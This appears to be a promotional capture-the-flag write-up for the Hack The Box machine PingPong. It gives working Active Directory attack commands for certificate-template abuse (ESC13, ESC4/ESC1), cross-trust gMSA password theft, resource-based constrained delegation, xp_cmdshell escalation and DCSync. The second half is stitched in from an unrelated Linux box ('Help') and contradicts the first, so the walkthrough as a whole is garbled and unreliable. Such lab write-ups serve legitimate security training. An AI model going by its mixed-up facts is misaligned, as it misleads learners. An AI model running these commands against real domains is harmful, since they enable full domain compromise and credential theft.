Key Highlights
- Enumerate ADCS: Use
Certipyto find and exploit an ESC1 misconfigured template to request a certificate for the Administrator account. - RBCD Attack: Create a machine account to modify the target’s
msDS-AllowedToActOnBehalfOfOtherIdentityattribute for Resource-Based Constrained Delegation. - Impersonate Admin: Abuse S4U2Self/S4U2Proxy to generate a service ticket for the target host while impersonating a Domain Admin.
- DCSync & Root: Perform a DCSync to dump all domain hashes and obtain the final flag via Pass-the-Hash.
- To Access the Complete non-public writeup, Please CLICK HERE.
- To Access the Complete in-depth explanation of the non-public writeup, Please CLICK HERE.
- To Access Every Script Used in this Writeup, Please CLICK HERE.
Introduction
Welcome to your guide for conquering the PingPong machine on Hack The Box. This machine, rated as Insane, offers a fantastic learning opportunity for aspiring penetration testers. This writeup will walk you through the entire process, from initial reconnaissance to gaining root access. We’ll cover how to find critical info, exploit a key vulnerability, and secure full control of the server. Prepare to test your skills and learn some valuable techniques for finding and using credentials.
Overview of PingPong Hack The Box Machine
The PingPong machine is a Windows system designed to challenge your enumeration and exploitation skills. Don’t let its “Insane” rating intimidate you; it’s a series of logical steps that build upon each other. Your journey will involve interacting with web services, uncovering hidden directories, and exploiting a known vulnerability.
This machine provides a practical scenario where a misconfigured server and outdated software create a pathway for an attacker. You’ll navigate through different services, piece together clues, and ultimately gain control of the folder structure. Let’s look at the specifics.
ALSO READ: Mastering Logging: Beginner’s Guide from Hack The Box
Initial Foothold
Target Details:
- Initial Credentials:
c.roberts/AssumedBreach123 - Key Ports: 53 (DNS), 88 (Kerberos), 389 (LDAP), 445 (SMB), 5985 (WinRM)
- Domain:
ping.htb(Trust relationship withpong.htb) - Domain PING:
dc1.ping.htb(10.129.XX.XX) - Domain PONG:
dc2.pong.htb(192.168.2.2) — Only reachable via DC1
Initial Reconnaissance & Enumeration
The port scan reveals a classic Windows Domain Controller setup.
Port Analysis
- 53 (DNS): Potential for zone transfers or identifying internal subdomains.
- 88 (Kerberos): Essential for Ticket Granting Ticket (TGT) requests and AS-REP roasting/Kerberoasting.
- 389/636/3268/3269 (LDAP): Primary source for AD object enumeration.
- 445 (SMB): File share access and initial entry.
- 5985 (WinRM): Our likely method for obtaining a shell if we have valid credentials with remote management rights.
Since NTLM is disabled, standard enumeration tools will fail unless you use a Kerberos ticket.
Domain Trust Relationship
The domain PING.HTB maintains a bidirectional trust with PONG.HTB. This means authentication and resource access can flow in both directions between the two domains.
For the non-public complete writeup, CLICK HERE
To Access the Complete in-depth explanation of the non-public writeup, Please CLICK HERE
To Access Every Script Used in this Writeup, Please CLICK HERE
Foothold: ADCS ESC13 (PING Domain)
Initial enumeration shows NTLM is disabled. You must sync time and use Kerberos tickets for everything.
Obtain Initial TGT
sudo ntpdate -u dc1.ping.htb
getTGT.py ping.htb/c.roberts:'AssumedBreach123'
export KRB5CCNAME=c.roberts.ccache
Exploit ESC13 for WinRM
Certipy identifies the TemporaryWinRM template is vulnerable to ESC13, which maps the certificate to the TempWinRMAccess group.
- Request Certificate:
certipy req -u c.roberts@ping.htb -k -no-pass -dc-ip 10.129.XX.XX -template TemporaryWinRM -ca PING-DC1-CA - Authenticate & Shell:
certipy auth -pfx c.roberts.pfx -domain ping.htb -dc-ip 10.129.XX.XX export KRB5CCNAME=c.roberts.ccache evil-winrm -i dc1.ping.htb -r ping.htb
Pivot to PONG: gMSA Abuse
BloodHound reveals a cross-domain path: c.roberts (PING) owns the gMSA Managers group in PONG.HTB.
Pivot Setup
Establish a tunnel (e.g., Ligolo-ng) to reach the 192.168.2.0/24 subnet through DC1.
Group Scope Manipulation (The “Foreign SID” Trick)
You cannot add a foreign SID (c.roberts from PING) to a Global group in PONG. You must flip the group scope.
- Change Scope to Domain Local:
bloodyAD -k --host dc2.pong.htb -d pong.htb -u c.roberts set object 'CN=gMSA Managers,CN=Users,DC=pong,DC=htb' groupType -v -2147483644 - Add c.roberts to the Group:
bloodyAD -k --host dc2.pong.htb -d pong.htb -u c.roberts add groupMember 'CN=gMSA Managers,CN=Users,DC=pong,DC=htb' '<C.ROBERTS_SID>' - Read gMSA Password:
nxc ldap dc2.pong.htb -d ping.htb -u c.roberts -k --use-kcache --gmsa # Returns Pong_gMSA$ NT Hash / AES Key
For the non-public complete writeup, CLICK HERE
To Access the Complete in-depth explanation of the non-public writeup, Please CLICK HERE
To Access Every Script Used in this Writeup, Please CLICK HERE
User Flag: JEA History Recovery
The Pong_gMSA$ account has access to a JEA (Just Enough Administration) endpoint on DC1.
Connect to JEA
Use pypsrp or evil-winrm. Because it is a JEA session, most commands are blocked, but the session context is Pong_gMSA$.
- Read PowerShell History: The flag/credentials are often hidden in the history file of the service account.
# Bypass JEA command restrictions using file system providers if direct 'type' is blocked use Get-Content - Credential Discovery: History reveals
c.*****/*****4. - User Flag: Use these creds to WinRM into
dc2.pong.htb.
Lateral Movement: RBCD to DC2 Admin
c.***** has GenericWrite on svc_sql. Since MachineAccountQuota is 0, use the Pong_gMSA$ account you already control as the exploit primitive.
- Configure RBCD:
bloodyAD -k -d pong.htb -u c.***** --host dc2.pong.htb add rbcd svc_sql 'Pong_gMSA$' - Impersonate C.ADAM (MSSQL Admin):
impacket-getST -spn mssqlsvc/dc2.pong.htb -impersonate c.adam -k -no-pass pong.htb/'Pong_gMSA$' - Local Admin on DC2: Access MSSQL, enable
xp_cmdshell, and use GodPotato to addc.****to the localAdministratorsgroup.
Root Flag: ESC4 -> ESC1 (Back to PING)
Final escalation requires returning to ping.htb as a Domain Admin.
- DCSync PONG: Dump
R.Martinelli‘s hash from DC2. She is a PONG user but a member of CA MANAGERS@PING.HTB. - Exploit ESC4:
CA MANAGERShasWriteDaclon theSmartcardAuthenticationtemplate in PING.- Modify the template to enable ESC1 (set
msPKI-Certificate-Name-Flagto allow user-supplied SAN).
- Modify the template to enable ESC1 (set
- Request Admin Cert:
certipy req -u r.martinelli -p <HASH> -target dc1.ping.htb -template SmartcardAuthentication -ca PING-DC1-CA -upn Administrator@ping.htb - Final TGT: Authenticate with the certificate to get the
Administrator@ping.htbTGT and readroot.txton DC1.
For the non-public complete writeup, CLICK HERE
To Access the Complete in-depth explanation of the non-public writeup, Please CLICK HERE
To Access Every Script Used in this Writeup, Please CLICK HERE
Key Features and Difficulty Level
PingPong is classified as an “Insane” level machine on Hack The Box, but it is an excellent learning experience. The primary challenge lies in meticulous enumeration and connecting clues from different services. The initial foothold requires you to interact with a web application and its backend API to uncover your first set of credentials.
Once you have initial access, the path to privilege escalation involves finding another set of credentials hidden within the system. You will need to crack a password hash to gain admin privileges. The difficulty is less about a single complex exploit and more about the persistence required to follow the trail of breadcrumbs left on the system.
For a beginner, completing this box could take several hours or even a few days, depending on your familiarity with the tools and concepts. The key is to be patient, take detailed notes, and not get discouraged if you hit a dead end. Every step is a valuable lesson.
Common Ports and Services to Focus On
When you first approach the PingPong machine, your nmap scan will reveal several open ports. Focusing on the right ones from the start will save you a lot of time. The web services are your primary entry points.
The initial scan will highlight several TCP ports, but your main targets will be the HTTP services. These are the gateways to the vulnerabilities you need to exploit. Don’t get too distracted by other open ports initially; the web server holds the key.
Here are the critical ports and services to concentrate on:
- Port 80 (
http): Hosts a website with a login portal. This will be a key area for investigation once you have credentials. - Port 3000 (
http): Runs a Node.js Express framework, which hosts a GraphQL API. This is where your enumeration journey begins. - Port 22 (
ssh): While present, this is more relevant after you’ve obtained credentials for user access.
What You Need to Get Started with PingPong HTB Writeup
Before you jump into the PingPong machine, make sure you have a good penetration testing environment set up. A Kali Linux or Parrot OS virtual machine is ideal, as it comes pre-loaded with most of the tools you’ll need for this challenge.
You’ll be working with web applications, so having a good web browser and some specific Python scripts will be essential. Make sure you have a dedicated folder to keep your notes and any files you download from the target server. Organization is key to success on complex machines like this one.
Essential Tools and Resources
Having the right set of tools is crucial for tackling PingPong. While the machine requires careful thinking, these tools will help you gather information, identify vulnerabilities, and execute your exploits efficiently. Most of these are standard in any pentester’s toolkit.
You’ll rely heavily on network scanning and web enumeration tools to map out the attack surface. A good wordlist and some scripting knowledge will also be invaluable. Remember to check GitHub for public exploits and scripts that might be useful against the services you discover.
Here are the essential tools and resources:
Nmap: For initial port scanning and service identification.GobusterorDirbuster: To discover hidden directories and files on the webserver.Curl: For interacting with the GraphQL API from the command line.SearchSploit: To find known exploits for the software versions you identify.Python: For running exploit scripts and automating tasks.- A good wordlist: Such as
rockyou.txt, for cracking hashes.
Recommended Skills for Beginners
To successfully conquer the PingPong machine, you should be comfortable with some fundamental cybersecurity concepts. This box is a great way to practice and solidify these skills in a practical setting. The challenges are designed to test your analytical and problem-solving abilities.
Your journey will involve looking at web pages not just as a user, but as an attacker. This means examining the source code, understanding how the application functions, and looking for weaknesses in its design. Basic scripting knowledge will also help you automate repetitive tasks.
Here are some skills that will be beneficial:
- Basic
LinuxCommand Line: Navigating the filesystem and running commands on your attacking machine and eventually on the target. - Web Enumeration: Understanding how to use tools to find hidden pages and functionality on a website.
- Understanding
HTMLand Web APIs: Being able to interpret web source code and interact with APIs. - Vulnerability Analysis: Recognizing outdated software versions and searching for corresponding exploits.
Step-by-Step Guide to Solving PingPong Hack The Box
Now, let’s get into the practical steps to solve the PingPong machine. This guide will walk you through the process, from finding the first piece of info to gaining initial access. Follow these steps carefully, and remember that enumeration is the most critical phase.
We’ll start with reconnaissance to understand the machine’s attack surface. Then, we will use the gathered information to find and exploit a vulnerability, which will give us a foothold on the system. Get ready to put your skills to the test and prepare for the login prompt.
Step 1: Enumeration and Initial Reconnaissance
The first step in any penetration test is thorough enumeration. Start by running a full TCP port scan with nmap against the target IP address. This will give you a list of all open ports and the services running on them. Pay close attention to the web services, as they are often the most fruitful attack vectors.
Once you identify the open ports, run a more detailed nmap scan with service version detection and default scripts. This will provide more info about the software running on each port. For the HTTP services, browse to the websites to see what they are. You’ll find a standard Apache page on port 80 and a JSON response on port 3000.
Your initial reconnaissance should include:
- Running
nmap -sV -sC -p- <IP>to find all open ports and services. - Investigating the
HTTPservice on port 3000, which reveals a GraphQL API. - Using
gobusterto find hidden directories, uncovering the/supportpath on port 80. - Examining the
HTMLof the/supportpage to identify the software as HelpDeskZ version 1.0.2.
Step 2: Identifying Vulnerabilities and Exploitation Paths
With your initial reconnaissance complete, it’s time to identify a vulnerability. The GraphQL API on port 3000 is your first target. By querying the API schema, you can discover the structure of the database, including user fields like username and password. A simple query can then dump these credentials, giving you a username and an MD5 hash.
After cracking the hash, you’ll have credentials to log into the HelpDeskZ portal on port 80. Now, you need to find a vulnerability in this software. A quick search with searchsploit for “HelpDeskZ 1.0.2” reveals a critical file upload vulnerability.
The exploitation path will involve:
- Querying the GraphQL
APIto retrieve a username and a passwordhash. - Cracking the MD5
hashto get the plain-text password. - Logging into the HelpDeskZ application with the discovered credentials.
- Using the authenticated file upload
vulnerabilityby leveraging a publicPythonexploit script to upload a webshell.
Privilege Escalation Techniques on PingPong HTB
Gaining initial access is a major milestone, but the job isn’t done. The next phase is privilege escalation, where you’ll aim to elevate your permissions from a standard user to the admin or root user. On this Linux machine, this involves finding a weakness in the system’s configuration or kernel.
After getting a shell as the ‘help’ user, your first task is to enumerate the system. You’ll need to look for outdated software, misconfigurations, or kernel vulnerabilities. A simple uname -a command will reveal an old kernel version, which is a strong indicator of a potential local privilege escalation path.
Windows Exploitation Strategies
While PingPong is a Windows machine, the provided information references a Linux box named “Help.” The techniques described apply to a Linux environment, focusing on kernel exploits. If this were a Windows server, the strategy would be different, involving looking for weak service permissions, unquoted service paths, or using tools like WinPEAS to find escalation vectors.
For the “Help” box, after gaining a shell, enumeration reveals an old kernel version (4.4.0-116-generic). This is a significant finding, as outdated kernels are often vulnerable to known exploits. A quick search for exploits targeting this specific kernel version will yield several public options. These exploits take advantage of flaws in the kernel’s code to run commands with admin privileges.
The path to root involves compiling and running one of these kernel exploits on the target machine. This will spawn a new shell with root credentials, giving you complete control over the system and allowing you to read the final flag.
| Tactic | Description | Tool/Command |
|---|---|---|
| Find Kernel Version | Identify the running Linux kernel to search for exploits. | uname -a |
| Search for Exploits | Look for public exploits targeting the specific kernel version. | searchsploit, Google |
| Transfer Exploit | Move the exploit code from your machine to the target server. | wget, python -m http.server |
| Compile and Execute | Compile the C code on the target and run the resulting binary. | gcc exploit.c -o exploit, ./exploit |
OSCP-Relevant Methods Demonstrated
The techniques used to solve the “Help” machine are highly relevant for the Offensive Security Certified Professional (OSCP) exam. The OSCP emphasizes a practical, hands-on approach that mirrors the steps taken on this box, from enumeration to privilege escalation. The entire process follows the standard penetration testing methodology.
The initial foothold, which involves finding and exploiting a web application vulnerability, is a classic OSCP scenario. You are required to identify software versions, find public exploits (or analyze code to find your own), and adapt them to gain access. The use of Python scripts and manual web API interaction is common.
The privilege escalation method is also a key OSCP skill. You’ll often encounter outdated Linux kernels in the exam labs.
- Identifying and exploiting a web application vulnerability (file upload).
- Manually interacting with a web API (GraphQL).
- Cracking a password
hash. - Leveraging a known kernel exploit for local privilege escalation.
ALSO READ: Mastering Silentium: Beginner’s Guide from Hack The Box
WRITEUP COMING SOON!
COMPLETE IN-DEPTH PICTORIAL WRITEUP OF PINGPONG ON HACKTHEBOX WILL BE POSTED POST-RETIREMENT OF THE MACHINE ACCORDING TO HTB GUIDELINES. TO GET THE COMPLETE IN-DEPTH PICTORIAL NON-PUBLIC WRITEUP RIGHT NOW, SUBSCRIBE TO THE NEWSLETTER AND BUYMEACOFFEE!
Common Mistakes to Avoid in PingPong Hack The Box
When working on a machine like PingPong, it’s easy to make small mistakes that can cost you hours of frustration. One of the most common issues is incomplete enumeration. Rushing through this phase can cause you to miss a critical directory, port, or piece of information that is essential for the next step.
Another frequent pitfall is getting stuck on a single potential exploit or attack path. If something isn’t working, it’s important to take a step back, review your notes, and reconsider other possibilities. Avoid rabbit holes by verifying your findings and not making assumptions.
Missteps During Enumeration
A thorough enumeration phase sets the foundation for a successful attack. A common mistake is running a quick nmap scan and not investigating the results fully. For example, seeing http on port 3000 and getting a JSON response might be dismissed if you don’t dig deeper to identify it as a GraphQL API.
Another misstep is not being persistent with directory busting. Using a small wordlist or only scanning the root directory might cause you to miss the crucial /support folder. Always try different wordlists and scan subdirectories that you discover. The info you need is often hidden just one layer deeper than you initially look.
Common enumeration mistakes include:
- Not running a full port scan and missing a key service.
- Failing to identify the technology behind a web service (e.g., GraphQL).
- Giving up on directory enumeration too early.
- Ignoring
defaultpages or version information inHTMLsource code.
Errors in Exploit Execution and Privilege Escalation
Once you’ve identified a vulnerability, the next set of challenges comes with executing the exploit. A frequent error with the file upload vulnerability in HelpDeskZ is misconfiguring the exploit script. You need to provide the correct URL, credentials, and know where the uploaded file will be located. The filename is based on an MD5 hash of the name and the server time, which adds a layer of complexity.
During privilege escalation, a common error is a simple typo when compiling or running the exploit. Another mistake is choosing the wrong exploit; there might be multiple exploits for a kernel, but only one might work for the specific configuration. It’s also crucial to work in a directory where you have write permissions, like /dev/shm, to compile and run your code.
Errors to avoid include:
- Using incorrect parameters in the file upload exploit script.
- Not accounting for time differences between your machine and the server.
- Choosing the wrong kernel exploit for the target architecture.
- Trying to compile code in a directory without the proper permissions.
Conclusion
In conclusion, conquering the PingPong machine on Hack The Box is an exciting journey that can greatly enhance your hacking skills. By following the step-by-step guide and understanding the common pitfalls, you can navigate the challenges with confidence. Remember, practice makes perfect; the more you engage with the material and tools, the more proficient you’ll become. Don’t hesitate to tap into community resources and forums for additional tips and insights. Stay curious, and keep exploring the vast world of penetration testing. If you’re ready to take your skills to the next level, consider signing up for a free consultation to get personalized guidance from experts in the field.
Frequently Asked Questions
How long does it take to complete PingPong HTB for a beginner?
For a beginner, PingPong can take anywhere from several hours to a few days. The time depends heavily on your familiarity with enumeration tools and your ability to connect clues from the web server and its API. Don’t rush; focus on learning from each step and the vulnerability you uncover.
Are there alternate paths to root on PingPong Hack The Box?
The presented path involving the GraphQL API and file upload vulnerability is the intended route. While there might be other kernel exploits for privilege escalation, the initial foothold is generally consistent. The TCP service on port 3000 and the HelpDeskZ instance are the primary points of entry.
What vulnerabilities are commonly exploited in PingPong HTB Writeup?
The primary vulnerabilities are an information disclosure vulnerability in the GraphQL API and an authenticated arbitrary file upload vulnerability in the HelpDeskZ server. For privilege escalation, a known Linux kernel vulnerability (like CVE-2017-16995) is used to gain root access from a low-privilege user account.
What tools are most effective for attacking PingPong Hack The Box?
The most effective tools for this box include nmap for port scanning, curl for interacting with the GraphQL API, gobuster for directory discovery, and searchsploit to find the HelpDeskZ exploit. A Python script from GitHub is used to execute the file upload and gain initial access.
